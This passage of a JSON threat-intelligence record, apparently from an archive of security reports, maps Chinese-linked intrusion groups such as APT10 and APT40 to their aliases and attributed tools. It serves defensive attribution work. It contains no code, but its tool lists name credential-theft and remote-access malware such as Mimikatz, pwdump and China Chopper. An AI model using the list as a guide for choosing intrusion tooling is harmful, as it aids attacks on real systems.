				"gsecdump",
				"PlugX",
				"ASPXSpy",
				"Cobalt Strike",
				"Mimikatz",
				"Impacket",
				"gh0st RAT",
				"certutil",
				"China Chopper",
				"HTTPBrowser",
				"Tasklist",
				"netstat",
				"SysUpdate",
				"HyperBro",
				"ZxShell",
				"RCSession",
				"ipconfig",
				"Clambling",
				"pwdump",
				"NBTscan",
				"Pandora",
				"Windows Credential Editor"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "83025f5e-302e-46b0-baf6-650a4d313dfc",
			"created_at": "2024-05-01T02:03:07.971863Z",
			"updated_at": "2026-04-10T02:00:03.743131Z",
			"deleted_at": null,
			"main_name": "BRONZE MOHAWK",
			"aliases": [
				"APT40 ",
				"GADOLINIUM ",
				"Gingham Typhoon ",
				"Kryptonite Panda ",
				"Leviathan ",
				"Nanhaishu ",
				"Pickleworm ",
				"Red Ladon ",
				"TA423 ",
				"Temp.Jumper ",
				"Temp.Periscope "
			],
			"source_name": "Secureworks:BRONZE MOHAWK",
			"tools": [
				"AIRBREAK",
				"BlackCoffee",
				"China Chopper",
				"Cobalt Strike",
				"DadJoke",
				"Donut",
				"FUSIONBLAZE",
				"GreenCrash",
				"Meterpreter",
				"Nanhaishu",
				"Orz",
				"SeDll"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "04b07437-41bb-4126-bcbb-def16f19d7c6",
			"created_at": "2022-10-25T16:07:24.232628Z",
			"updated_at": "2026-04-10T02:00:04.906097Z",
			"deleted_at": null,
			"main_name": "Stone Panda",
			"aliases": [
				"APT 10",
				"ATK 41",
				"Bronze Riverside",
				"CTG-5938",
				"CVNX",
				"Cuckoo Spear",
				"Earth Kasha",
				"G0045",
				"G0093",
				"Granite Taurus",
				"Happyyongzi",
				"Hogfish",
				"ITG01",
				"Operation A41APT",
				"Operation Cache Panda",
				"Operation ChessMaster",
				"Operation Cloud Hopper",
				"Operation Cuckoo Spear",
				"Operation New Battle",
				"Operation Soft Cell",
				"Operation TradeSecret",
				"Potassium",
				"Purple Typhoon",
				"Red Apollo",
				"Stone Panda",
				"TA429",
				"menuPass",
				"menuPass Team"
			],
			"source_name": "ETDA:Stone Panda",
			"tools": [
				"Agent.dhwf",
				"Agentemis",
				"Anel",
				"AngryRebel",
				"BKDR_EVILOGE",
				"BKDR_HGDER",
				"BKDR_NVICM",
				"BUGJUICE",
				"CHINACHOPPER",
				"ChChes",
				"China Chopper",
				"Chymine",
				"CinaRAT",
				"Cobalt Strike",
				"CobaltStrike",
				"DARKTOWN",
				"DESLoader",
				"DILLJUICE",
				"DILLWEED",
				"Darkmoon",
				"DelfsCake",
				"Derusbi",
				"Destroy RAT",
				"DestroyRAT",
				"Ecipekac",
				"Emdivi",
				"EvilGrab",
				"EvilGrab RAT",
				"FYAnti",
				"Farfli",
				"Gen:Trojan.Heur.PT",
				"Gh0st RAT",
				"Ghost RAT",
				"GreetCake",
				"HAYMAKER",
				"HEAVYHAND",
				"HEAVYPOT",
				"HTran",
				"HUC Packet Transmit Tool",
				"Ham Backdoor",
				"HiddenFace",
				"Impacket",
				"Invoke the Hash",
				"KABOB",
				"Kaba",
				"Korplug",
				"LODEINFO",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"MiS-Type",
				"Mimikatz",
				"Moudour",
				"Mydoor",
				"NBTscan",
				"NOOPDOOR",
				"Newsripper",
				"P8RAT",
				"PCRat",
				"PlugX",
				"Poison Ivy",
				"Poldat",
				"PowerSploit",
				"PowerView",
				"PsExec",
				"PsList",
				"Quarks PwDump",
				"Quasar RAT",
				"QuasarRAT",
				"RedDelta",
				"RedLeaves",
				"Rubeus",
				"SNUGRIDE",
				"SPIVY",
				"SharpSploit",
				"SigLoader",
				"SinoChopper",
				"SodaMaster",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Trochilus RAT",
				"UpperCut",
				"Vidgrab",
				"WinRAR",
				"WmiExec",
				"Wmonder",
				"Xamtrav",
				"Yggdrasil",
				"Zlib",
				"certutil",
				"certutil.exe",
				"cobeacon",
				"dfls",
				"lena",
				"nbtscan",
				"pivy",
				"poisonivy",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3b8b4ed7-e8cc-4a3a-b14d-c8ebf87c0f9c",
			"created_at": "2023-01-06T13:46:39.062729Z",
			"updated_at": "2026-04-10T02:00:03.200784Z",
			"deleted_at": null,
			"main_name": "Operation Soft Cell",
			"aliases": [],
			"source_name": "MISPGALAXY:Operation Soft Cell",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "59be3740-c8c7-47aa-84c8-e80d0cb7ea3a",
			"created_at": "2022-10-25T15:50:23.481057Z",
			"updated_at": "2026-04-10T02:00:05.306469Z",
			"deleted_at": null,
			"main_name": "Leviathan",
			"aliases": [
				"MUDCARP",
				"Kryptonite Panda",
				"Gadolinium",
				"BRONZE MOHAWK",
				"TEMP.Jumper",
				"APT40",
				"TEMP.Periscope",
				"Gingham Typhoon"
			],
			"source_name": "MITRE:Leviathan",
			"tools": [
				"Windows Credential Editor",
				"BITSAdmin",
				"HOMEFRY",
				"Derusbi",
				"at",
				"BLACKCOFFEE",
				"BADFLICK",
				"gh0st RAT",
				"PowerSploit",
				"MURKYTOP",
				"NanHaiShu",
				"Orz",
				"Cobalt Strike",
				"China Chopper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b9806584-4d82-4f32-ae97-18a2583e8d11",
			"created_at": "2022-10-25T16:07:23.787833Z",
			"updated_at": "2026-04-10T02:00:04.749709Z",
			"deleted_at": null,
			"main_name": "Leviathan",
			"aliases": [
				"APT 40",
				"ATK 29",
				"Bronze Mohawk",
				"G0065",
				"Gadolinium",
				"Gingham Typhoon",
				"ISLANDDREAMS",
				"ITG09",
				"Jumper Taurus",
				"Kryptonite Panda",
				"Mudcarp",
				"Red Ladon",
				"TA423",
				"TEMP.Jumper",
				"TEMP.Periscope"
			],
			"source_name": "ETDA:Leviathan",
			"tools": [
				"AIRBREAK",
				"Agent.dhwf",
				"Agentemis",
				"AngryRebel",
				"BADFLICK",
				"BlackCoffee",
				"CHINACHOPPER",
				"China Chopper",
				"Cobalt Strike",
				"CobaltStrike",
				"DADJOKE",
				"Dadstache",
				"Derusbi",
				"Destroy RAT",
				"DestroyRAT",
				"Farfli",
				"GRILLMARK",
				"Gh0st RAT",
				"Ghost RAT",
				"HOMEFRY",
				"Hellsing Backdoor",
				"Kaba",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"LUNCHMONEY",
				"Living off the Land",
				"MURKYTOP",
				"Moudour",
				"Mydoor",
				"NanHaiShu",
				"Orz",
				"PCRat",
				"PNGRAT",
				"PlugX",
				"RedDelta",
				"SeDLL",
				"Sensocode",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Xamtrav",
				"ZXShell",
				"ZoxPNG",
				"cobeacon",
				"gresim",
				"scanbox"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434370,
	"ts_updated_at": 1775826699,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c417329a7eae9f54d26b9cafe4325ee95320f48b.pdf",
		"text": "https://archive.orkl.eu/c417329a7eae9f54d26b9cafe4325ee95320f48b.txt",
		"img": "https://archive.orkl.eu/c417329a7eae9f54d26b9cafe4325ee95320f48b.jpg"
	}
}